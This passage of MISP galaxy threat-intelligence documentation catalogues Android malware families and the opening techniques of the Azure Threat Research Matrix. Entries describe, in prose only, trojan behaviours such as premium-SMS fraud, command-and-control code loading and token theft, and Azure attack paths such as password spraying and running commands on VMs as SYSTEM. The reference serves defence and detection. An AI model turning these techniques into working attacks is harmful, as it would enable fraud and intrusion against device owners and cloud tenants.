Tapsnake is a Trojan horse for Android phones that is embedded into a game. It tracks the phone’s location and posts it to a remote web service.

The tag is: misp-galaxy:android="Tapsnake"

Table 413. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2010-081214-2657-99

Tascudap

Tascudap is a Trojan horse for Android devices that uses the compromised device in denial of service attacks.

The tag is: misp-galaxy:android="Tascudap"

Table 414. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-121312-4547-99

Teelog

Teelog is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Teelog"

Table 415. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-040215-2736-99

Temai

Temai is a Trojan horse for Android applications that opens a back door and downloads malicious files onto the compromised device.

The tag is: misp-galaxy:android="Temai"

Table 416. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-091722-4052-99

Tetus

Tetus is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Tetus"

Table 417. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-012409-4705-99

Tgpush

Tgpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Tgpush"

Table 418. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032816-0259-99

Tigerbot

Tigerbot is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Tigerbot"

Table 419. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-041010-2221-99

Tonclank

Tonclank is a Trojan horse that steals information and may open a back door on Android devices.

The tag is: misp-galaxy:android="Tonclank"

Table 420. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-061012-4545-99

Trogle

Trogle is a worm for Android devices that may steal information from the compromised device.

The tag is: misp-galaxy:android="Trogle"

Table 421. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-081213-5553-99

Twikabot

Twikabot is a Trojan horse for Android devices that attempts to steal information.

The tag is: misp-galaxy:android="Twikabot"

Table 422. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062614-5813-99

Uapush

Uapush is a Trojan horse for Android devices that steals information from the compromised device. It may also display advertisements and send SMS messages from the compromised device.

The tag is: misp-galaxy:android="Uapush"

Table 423. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-040114-2910-99

Umeng

Umeng is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Umeng"

Table 424. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040307-5749-99

Updtbot

Updtbot is a Trojan horse for Android devices that may arrive through SMS messages. It may then open a back door on the compromised device.

The tag is: misp-galaxy:android="Updtbot"

Table 425. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-041611-4136-99

Upush

Upush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Upush"

Table 426. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-0733-99

Uracto

Uracto is a Trojan horse for Android devices that steals personal information and sends spam SMS messages to contacts found on the compromised device.

The tag is: misp-galaxy:android="Uracto"

Table 427. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-031805-2722-99

Uranico

Uranico is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Uranico"

Table 428. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-052803-3835-99

Usbcleaver

Usbcleaver is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Usbcleaver"

Table 429. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99

Utchi

Utchi is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Utchi"

Table 430. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-2536-99

Uten

Uten is a Trojan horse for Android devices that may send, block, and delete SMS messages on a compromised device. It may also download and install additional applications and attempt to gain root privileges.

The tag is: misp-galaxy:android="Uten"

Table 431. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-092316-4752-99

Uupay

Uupay is a Trojan horse for Android devices that steals information from the compromised device. It may also download additional malware.

The tag is: misp-galaxy:android="Uupay"

Table 432. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-061714-1550-99

Uxipp

Uxipp is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.

The tag is: misp-galaxy:android="Uxipp"

Table 433. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-060910-5804-99

Vdloader

Vdloader is a Trojan horse for Android devices that opens a back door on the compromised device and steals confidential information.

The tag is: misp-galaxy:android="Vdloader"

Table 434. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080209-1420-99

VDopia

VDopia is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="VDopia"

Table 435. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052712-1559-99

Virusshield

Virusshield is a Trojan horse for Android devices that claims to scan apps and protect personal information, but has no real functionality.

The tag is: misp-galaxy:android="Virusshield"

Table 436. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040810-5457-99

VServ

VServ is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="VServ"

Table 437. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052619-3117-99

Walkinwat

Walkinwat is a Trojan horse that steals information from the compromised device.

The tag is: misp-galaxy:android="Walkinwat"

Table 438. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-033008-4831-99

Waps

Waps is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Waps"

Table 439. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040406-5437-99

Waren

Waren is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Waren"

Table 440. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-5501-99

Windseeker

Windseeker is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Windseeker"

Table 441. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-101519-0720-99

Wiyun

Wiyun is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Wiyun"

Table 442. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-5646-99

Wooboo

Wooboo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Wooboo"

Table 443. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-5829-99

Wqmobile

Wqmobile is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Wqmobile"

Table 444. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-4926-99

YahooAds

YahooAds is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="YahooAds"

Table 445. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-3229-99

Yatoot

Yatoot is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Yatoot"

Table 446. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-031408-4748-99

Yinhan

Yinhan is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Yinhan"

Table 447. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-3350-99

Youmi

Youmi is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Youmi"

Table 448. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040407-4318-99

YuMe

YuMe is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="YuMe"

Table 449. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-0322-99

Zeahache

Zeahache is a Trojan horse that elevates privileges on the compromised device.

The tag is: misp-galaxy:android="Zeahache"

Table 450. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-032309-5042-99

ZertSecurity

ZertSecurity is a Trojan horse for Android devices that steals information and sends it to a remote attacker.

The tag is: misp-galaxy:android="ZertSecurity"

Table 451. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-050820-4100-99

ZestAdz

ZestAdz is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="ZestAdz"

Table 452. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052616-3821-99

Zeusmitmo

Zeusmitmo is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Zeusmitmo"

Table 453. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080818-0448-99

SLocker

The SLocker family is one of the oldest mobile lock-screen and file-encrypting ransomware families; it used to impersonate law enforcement agencies to convince victims to pay the ransom.

The tag is: misp-galaxy:android="SLocker"

SLocker is also known as:

  • SMSLocker

Table 454. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/mobile-ransomware-pocket-sized-badness/

http://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/

Loapi

A malware strain known as Loapi will damage phones if users don’t remove it from their devices. Left to its own means, this modular threat will download a Monero cryptocurrency miner that will overheat and overwork the phone’s components, which will make the battery bulge, deform the phone’s cover, or even worse. Discovered by Kaspersky Labs, researchers say Loapi appears to have evolved from Podec, a malware strain spotted in 2015.

The tag is: misp-galaxy:android="Loapi"

Table 455. Table References

Links

https://www.bleepingcomputer.com/news/security/android-malware-will-destroy-your-phone-no-ifs-and-buts-about-it/

Podec

Late last year, we encountered an SMS Trojan called Trojan-SMS.AndroidOS.Podec which used a very powerful legitimate system to protect itself against analysis and detection. After we removed the protection, we saw a small SMS Trojan with most of its malicious payload still in development. Before long, though, we intercepted a fully-fledged version of Trojan-SMS.AndroidOS.Podec in early 2015. The updated version proved to be remarkable: it can send messages to premium-rate numbers employing tools that bypass the Advice of Charge system (which notifies users about the price of a service and requires authorization before making the payment). It can also subscribe users to premium-rate services while bypassing CAPTCHA. This is the first time Kaspersky Lab has encountered this kind of capability in any Android-Trojan.

The tag is: misp-galaxy:android="Podec"

Table 456. Table References

Links

https://securelist.com/sms-trojan-bypasses-captcha/69169//

Chamois

Chamois is one of the largest PHA families in Android to date and is distributed through multiple channels. While much of the backdoor version of this family was cleaned up in 2016, a new variant emerged in 2017. To avoid detection, this version employs a number of techniques, such as implementing custom code obfuscation, preventing user notifications, and not appearing in the device’s app list. Chamois apps, which in many cases come preloaded with the system image, try to trick users into clicking ads by displaying deceptive graphics to commit WAP or SMS fraud.

The tag is: misp-galaxy:android="Chamois"

Table 457. Table References

Links

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

https://android-developers.googleblog.com/2017/03/detecting-and-eliminating-chamois-fraud.html

IcicleGum

IcicleGum is a spyware PHA family whose apps rely on versions of the Igexin ads SDK that offer dynamic code-loading support. IcicleGum apps use this library’s code-loading features to fetch encrypted DEX files over HTTP from command-and-control servers. The files are then decrypted and loaded via class reflection to read and send phone call logs and other data to remote locations.

The tag is: misp-galaxy:android="IcicleGum"

IcicleGum has relationships with:

  • similar: misp-galaxy:android="Igexin" with estimative-language:likelihood-probability="likely"

Table 458. Table References

Links

https://blog.lookout.com/igexin-malicious-sdk

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

BreadSMS

BreadSMS is a large SMS-fraud PHA family that we started tracking at the beginning of 2017. These apps compose and send text messages to premium numbers without the user’s consent. In some cases, BreadSMS apps also implement subscription-based SMS fraud and silently enroll users in services provided by their mobile carriers. These apps are linked to a group of command-and-control servers whose IP addresses change frequently and that are used to provide the apps with premium SMS numbers and message text.

The tag is: misp-galaxy:android="BreadSMS"

Table 459. Table References

Links

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

JamSkunk

JamSkunk is a toll-fraud PHA family composed of apps that subscribe users to services without their consent. These apps disable Wi-Fi to force traffic to go through users' mobile data connection and then contact command-and-control servers to dynamically fetch code that tries to bypass the network’s WAP service subscription verification steps. This type of PHA monetizes their abuse via WAP billing, a payment method that works through mobile data connections and allows users to easily sign up and pay for new services using their existing account (i.e., services are billed directly by the carrier, and not the service provider; the user does not need a new account or a different form of payment). Once authentication is bypassed, JamSkunk apps enroll the device in services that the user may not notice until they receive and read their next bill.

The tag is: misp-galaxy:android="JamSkunk"

Table 460. Table References

Links

https://blog.fosec.vn/malicious-applications-stayed-at-google-appstore-for-months-d8834ff4de59

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

Expensive Wall

Expensive Wall is a family of SMS-fraud apps that affected a large number of devices in 2017. Expensive Wall apps use code obfuscation to slow down analysis and evade detection, and rely on the JS2Java bridge to allow JavaScript code loaded inside a Webview to call Java methods the way Java apps directly do. Upon launch, Expensive Wall apps connect to command-and-control servers to fetch a domain name. This domain is then contacted via a Webview instance that loads a webpage and executes JavaScript code that calls Java methods to compose and send premium SMS messages or click ads without users' knowledge.

The tag is: misp-galaxy:android="Expensive Wall"

Table 461. Table References

Links

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/

BambaPurple

BambaPurple is a two-stage toll-fraud PHA family that tries to trick users into installing it by disguising itself as a popular app. After install, the app disables Wi-Fi to force the device to use its 3G connection, then redirects to subscription pages without the user’s knowledge, clicks subscription buttons using downloaded JavaScript, and intercepts incoming subscription SMS messages to prevent the user from unsubscribing. In a second stage, BambaPurple installs a backdoor app that requests device admin privileges and drops a .dex file. This executable checks to make sure it is not being debugged, downloads even more apps without user consent, and displays ads.

The tag is: misp-galaxy:android="BambaPurple"

Table 462. Table References

Links

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

KoreFrog

KoreFrog is a family of trojan apps that request permission to install packages and push other apps onto the device as system apps without the user’s authorization. System apps can be disabled by the user, but cannot be easily uninstalled. KoreFrog apps operate as daemons running in the background that try to impersonate Google and other system apps by using misleading names and icons to avoid detection. The KoreFrog PHA family has also been observed to serve ads, in addition to apps.

The tag is: misp-galaxy:android="KoreFrog"

Table 463. Table References

Links

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

Gaiaphish

Gaiaphish is a large family of trojan apps that target authentication tokens stored on the device to abuse the user’s privileges for various purposes. These apps use base64-encoded URL strings to avoid detection of the command-and-control servers they rely on to download APK files. These files contain phishing apps that try to steal GAIA authentication tokens that grant the user permissions to access Google services, such as Google Play, Google+, and YouTube. With these tokens, Gaiaphish apps are able to generate spam and automatically post content (for instance, fake app ratings and comments on Google Play app pages).

The tag is: misp-galaxy:android="Gaiaphish"

Table 464. Table References

Links

https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf

RedDrop

RedDrop can perform a vast array of malicious actions, including recording nearby audio and uploading the data to cloud-storage accounts on Dropbox and Google Drive.

The tag is: misp-galaxy:android="RedDrop"

Table 465. Table References

Links

https://www.bleepingcomputer.com/news/security/new-reddrop-android-spyware-records-nearby-audio/

HenBox

HenBox apps masquerade as others such as VPN apps and Android system apps; some apps carry legitimate versions of other apps which they drop and install as a decoy technique. While some of the legitimate apps HenBox uses as decoys can be found on Google Play, HenBox apps themselves are found only on third-party (non-Google Play) app stores. HenBox apps appear to primarily target the Uyghurs – a Turkic ethnic group living mainly in the Xinjiang Uyghur Autonomous Region in North West China. HenBox has ties to infrastructure used in targeted attacks, with a focus on politics in South East Asia. These attackers have used additional malware families in previous activity dating to at least 2015 that include PlugX, Zupdax, 9002, and Poison Ivy. HenBox apps target devices made by the Chinese consumer electronics manufacturer Xiaomi and those running MIUI, Xiaomi’s operating system based on Google Android. Furthermore, the malicious apps register their intent to process certain events broadcast on compromised devices in order to execute malicious code. This is common practice for many Android apps; however, HenBox sets itself up to trigger based on alerts from Xiaomi smart-home IoT devices, and once activated, proceeds to steal information from a myriad of sources, including many mainstream chat, communication and social media apps. The stolen information includes personal and device information.

The tag is: misp-galaxy:android="HenBox"

Table 466. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/04/unit42-henbox-inside-coop/

MysteryBot

Cybercriminals are currently developing a new strain of malware targeting Android devices which blends the features of a banking trojan, keylogger, and mobile ransomware.

The tag is: misp-galaxy:android="MysteryBot"

MysteryBot has relationships with:

  • similar: misp-galaxy:malpedia="MysteryBot" with estimative-language:likelihood-probability="likely"

Table 467. Table References

Links

https://www.bleepingcomputer.com/news/security/new-mysterybot-android-malware-packs-a-banking-trojan-keylogger-and-ransomware/

Skygofree

At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014. Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals. We observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants. These domains have been registered by the attackers since 2015. According to our telemetry, that was the year the distribution campaign was at its most active. The activities continue: the most recently observed domain was registered on October 31, 2017. Based on our KSN statistics, there are several infected individuals, exclusively in Italy. Moreover, as we dived deeper into the investigation, we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine. The version we found was built at the beginning of 2017, and at the moment we are not sure whether this implant has been used in the wild. We named the malware Skygofree, because we found the word in one of the domains.

The tag is: misp-galaxy:android="Skygofree"

Skygofree has relationships with:

  • similar: misp-galaxy:malpedia="Skygofree" with estimative-language:likelihood-probability="likely"

Table 468. Table References

Links

https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/

BusyGasper

A new family of spyware for Android grabbed the attention of security researchers through its unusual set of features and their original implementation. Tagged BusyGasper by security experts at Kaspersky, the malware stands out through its ability to monitor the various sensors present on the targeted phone. Based on the motion detection logs, it can recognize the opportune time for running and stopping its activity.

The tag is: misp-galaxy:android="BusyGasper"

Table 469. Table References

Links

https://www.bleepingcomputer.com/news/security/unsophisticated-android-spyware-monitors-device-sensors/

Triout

Bitdefender says Triout samples they discovered were masquerading in a clone of a legitimate application, but they were unable to discover where this malicious app was being distributed from. The obvious guess would be via third-party Android app stores, or app-sharing forums, popular in some areas of the globe.

The tag is: misp-galaxy:android="Triout"

Table 470. Table References

Links

https://www.bleepingcomputer.com/news/security/new-android-triout-malware-can-record-phone-calls-steal-pictures/

AndroidOS_HidenAd

An active adware family (detected by Trend Micro as AndroidOS_HidenAd) disguised as 85 game, TV, and remote control simulator apps on the Google Play store.

The tag is: misp-galaxy:android="AndroidOS_HidenAd"

AndroidOS_HidenAd is also known as:

  • AndroidOS_HiddenAd

Table 471. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/adware-disguised-as-game-tv-remote-control-apps-infect-9-million-google-play-users/

Razdel

The Banking Trojan found in Google Play is identified as Razdel, a variant of BankBot mobile banking Trojan. This newly observed variant has taken mobile threats to the next level incorporating: Remote access Trojan functions, SMS interception, UI (User Interface) Overlay with masqueraded pages etc.

The tag is: misp-galaxy:android="Razdel"

Table 472. Table References

Links

http://www.virusremovalguidelines.com/tag/what-is-bankbot

https://mobile.twitter.com/pr3wtd/status/1097477833625088000

Vulture

Vulture is an Android banking trojan found in Google Play by ThreatFabric. It uses screen recording and keylogging as its main strategy to harvest login credentials.

The tag is: misp-galaxy:android="Vulture"

Table 473. Table References

Links

https://www.threatfabric.com/blogs/vultur-v-for-vnc.html

https://twitter.com/icebre4ker/status/1485651238175846400

Anubis

Starting in June 2018, a number of new malware downloader samples that infect users with BankBot Anubis (aka Go_P00t) were discovered. The campaign features at least 10 malicious downloaders disguised as various applications, all of which fetch mobile banking Trojans that run on Android-based devices. Anubis masquerades as Google Protect.

The tag is: misp-galaxy:android="Anubis"

Table 474. Table References

Links

https://securityintelligence.com/anubis-strikes-again-mobile-malware-continues-to-plague-users-in-official-app-stores/

GodFather

The Android banking Trojan Godfather is currently being utilized by cybercriminals to attack users of popular financial services across the globe. Godfather is designed to allow threat actors to harvest login credentials for banking applications and other financial services, and drain the accounts. To date, its victims include users of over 400 international targets, including banking applications, cryptocurrency wallets, and crypto exchanges. Few people realize that hiding under Godfather’s hood is an old banking Trojan called Anubis, whose functionality has become outdated due to Android updates and the efforts of malware detection and prevention providers. Group-IB first detected Godfather, a mobile banking Trojan that steals the banking and cryptocurrency exchange credentials of users, in June 2021. Almost a year later, in March 2022, researchers at Threat Fabric were the first to mention the banking Trojan publicly. A few months later, in June, the Trojan stopped being circulated. One of the reasons, Group-IB analysts believe, why Godfather was taken out of use was for developers to update the Trojan further. Sure enough, Godfather reappeared in September 2022, now with slightly modified WebSocket functionality.

The tag is: misp-galaxy:android="GodFather"

GodFather has relationships with:

  • successor-of: misp-galaxy:android="Anubis" with estimative-language:likelihood-probability="likely"

Table 475. Table References

Links

https://blog.group-ib.com/godfather-trojan

Azure Threat Research Matrix

The purpose of the Azure Threat Research Matrix (ATRM) is to educate readers on the potential of Azure-based tactics, techniques, and procedures (TTPs). It is not to teach how to weaponize or specifically abuse them. For this reason, some specific commands will be obfuscated or parts will be omitted to prevent abuse.

Azure Threat Research Matrix is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Microsoft - Karl Fosaaen - Nestori Syynimaa - Ryan Cobb - Roberto Rodriguez - Manuel Berrueta - Jonny Johnson - Dor Edry - Ram Pliskin - Nikhil Mittal - MITRE ATT&CK - AlertIQ - Craig Fretwell

AZT101 - Port Mapping

It is possible to view the open ports on a virtual machine by viewing the Virtual Network Interface’s assigned Network Security Group.

The tag is: misp-galaxy:atrm="AZT101 - Port Mapping"

Table 476. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT101/AZT101

AZT102 - IP Discovery

It is possible to view the IP address on a resource by viewing the Virtual Network Interface.

The tag is: misp-galaxy:atrm="AZT102 - IP Discovery"

Table 477. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT102/AZT102

AZT103 - Public Accessible Resource

A resource within Azure is accessible from the public internet.

The tag is: misp-galaxy:atrm="AZT103 - Public Accessible Resource"

Table 478. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT103/AZT103

AZT104 - Gather User Information

An adversary may obtain information about a User within Azure Active Directory. Details may include email addresses, first/last names, job information, addresses, and assigned roles. By default, all users are able to read other users’ roles and group memberships within AAD.

The tag is: misp-galaxy:atrm="AZT104 - Gather User Information"

Table 479. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT104/AZT104

AZT105 - Gather Application Information

An adversary may obtain information about an application within Azure Active Directory.

The tag is: misp-galaxy:atrm="AZT105 - Gather Application Information"

Table 480. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT105/AZT105

AZT106 - Gather Role Information

An adversary may obtain information about a role within Azure Active Directory or within Azure Resource Manager.

The tag is: misp-galaxy:atrm="AZT106 - Gather Role Information"

Table 481. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT106/AZT106

AZT106.1 - Gather AAD Role Information

An adversary may gather role assignments within Azure Active Directory.

The tag is: misp-galaxy:atrm="AZT106.1 - Gather AAD Role Information"

Table 482. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT106/AZT106-1

AZT106.2 - Gather Application Role Information

An adversary may gather information about an application role and its member assignments within Azure Active Directory.

The tag is: misp-galaxy:atrm="AZT106.2 - Gather Application Role Information"

Table 483. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT106/AZT106-2

AZT106.3 - Gather Azure Resources Role Assignments

An adversary may gather role assignments for a specific Azure Resource, Resource Group, or Subscription.

The tag is: misp-galaxy:atrm="AZT106.3 - Gather Azure Resources Role Assignments"

Table 484. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT106/AZT106-3

AZT107 - Gather Resource Data

An adversary may obtain information and data within a resource.

The tag is: misp-galaxy:atrm="AZT107 - Gather Resource Data"

Table 485. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT107/AZT107

AZT108 - Gather Victim Data

An adversary may access a user’s personal data if their account is compromised. This includes data such as email, OneDrive, Teams, etc.

The tag is: misp-galaxy:atrm="AZT108 - Gather Victim Data"

Table 486. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Reconnaissance/AZT108/AZT108

AZT201 - Valid Credentials

Adversaries may log in to AzureAD using valid credentials. By logging in with valid credentials to an account or service principal, the adversary assumes all privileges of that account or service principal. If the account is privileged, this may lead to other tactics, such as persistence or privilege escalation.

The tag is: misp-galaxy:atrm="AZT201 - Valid Credentials"

Table 487. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/InitialAccess/AZT201/AZT201

AZT201.1 - User Account

By obtaining valid user credentials, an adversary may log in to AzureAD via the command line or through the Azure Portal.

The tag is: misp-galaxy:atrm="AZT201.1 - User Account"

Table 488. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/InitialAccess/AZT201/AZT201-1

AZT201.2 - Service Principal

By obtaining a valid secret or certificate, an adversary may log in to AzureAD via the command line.

The tag is: misp-galaxy:atrm="AZT201.2 - Service Principal"

Table 489. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/InitialAccess/AZT201/AZT201-2

AZT202 - Password Spraying

An adversary may potentially gain access to AzureAD by guessing a common password for multiple users.

The tag is: misp-galaxy:atrm="AZT202 - Password Spraying"

Table 490. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/InitialAccess/AZT202/AZT202

AZT203 - Malicious Application Consent

An adversary may lure a victim into giving their access to a malicious application registered in AzureAD.

The tag is: misp-galaxy:atrm="AZT203 - Malicious Application Consent"

Table 491. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/InitialAccess/AZT203/AZT203

AZT301 - Virtual Machine Scripting

Adversaries may abuse access to virtual machines by executing a script through various methods in order to gain access to the Virtual Machine.

The tag is: misp-galaxy:atrm="AZT301 - Virtual Machine Scripting"

Table 492. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301

AZT301.1 - RunCommand

By utilizing the 'RunCommand' feature on a Virtual Machine, an attacker can pass:

  • Windows: PowerShell commands to the VM as SYSTEM.

  • Linux: Shell commands to the VM as root.

The tag is: misp-galaxy:atrm="AZT301.1 - RunCommand"

Table 493. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-1

AZT301.2 - CustomScriptExtension

By utilizing the 'CustomScriptExtension' extension on a Virtual Machine, an attacker can pass PowerShell commands to the VM as SYSTEM.

The tag is: misp-galaxy:atrm="AZT301.2 - CustomScriptExtension"

Table 494. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-2

AZT301.3 - Desired State Configuration

By utilizing the 'Desired State Configuration extension' extension on a Virtual Machine, an attacker can pass PowerShell commands to the VM as SYSTEM.

The tag is: misp-galaxy:atrm="AZT301.3 - Desired State Configuration"

Table 495. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-3

AZT301.4 - Compute Gallery Application

By utilizing Compute Gallery Applications, an attacker can pass MS-DOS or PowerShell commands to the VM as SYSTEM.

The tag is: misp-galaxy:atrm="AZT301.4 - Compute Gallery Application"

Table 496. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-4

AZT301.5 - AKS Command Invoke

By utilizing 'command invoke' on an Azure Kubernetes Service (AKS) cluster, an attacker can pass commands to the cluster’s VM as SYSTEM.

The tag is: misp-galaxy:atrm="AZT301.5 - AKS Command Invoke"

Table 497. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-5

AZT301.6 - Vmss Run Command

By utilizing the 'RunCommand' feature on a virtual machine scale set (Vmss), an attacker can execute a command on an instance or instances of VMs as:

  • Windows: PowerShell commands to the VM as SYSTEM.

  • Linux: Shell commands to the VM as root.

The tag is: misp-galaxy:atrm="AZT301.6 - Vmss Run Command"

Table 498. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-6

AZT301.7 - Serial Console

By utilizing the serial console feature on an Azure Virtual Machine, an adversary can pass arbitrary commands.

The tag is: misp-galaxy:atrm="AZT301.7 - Serial Console"

Table 499. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT301/AZT301-7

AZT302 - Serverless Scripting

Adversaries may abuse access to serverless resources that are able to execute PowerShell or Python scripts on an Azure resource.

The tag is: misp-galaxy:atrm="AZT302 - Serverless Scripting"

Table 500. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT302/AZT302

AZT302.1 - Automation Account Runbook Hybrid Worker Group

By utilizing an Automation Account configured with a Hybrid Worker Group, an attacker can execute Azure commands on any Azure VM within that Hybrid Worker Group.

The tag is: misp-galaxy:atrm="AZT302.1 - Automation Account Runbook Hybrid Worker Group"

Table 501. Table References

Links

https://microsoft.github.io/Azure-Threat-Research-Matrix/Execution/AZT302/AZT302-1

AZT302.2 - Automation Account Runbook RunAs Account

By utilizing an Automation Account configured with a RunAs account, an attacker can execute commands on an Azure VM via RunCommand (AZT301.1) if that service principal has the correct role and privileges.

The tag is: misp-galaxy:atrm="AZT302.2 - Automation Account Runbook RunAs Account"

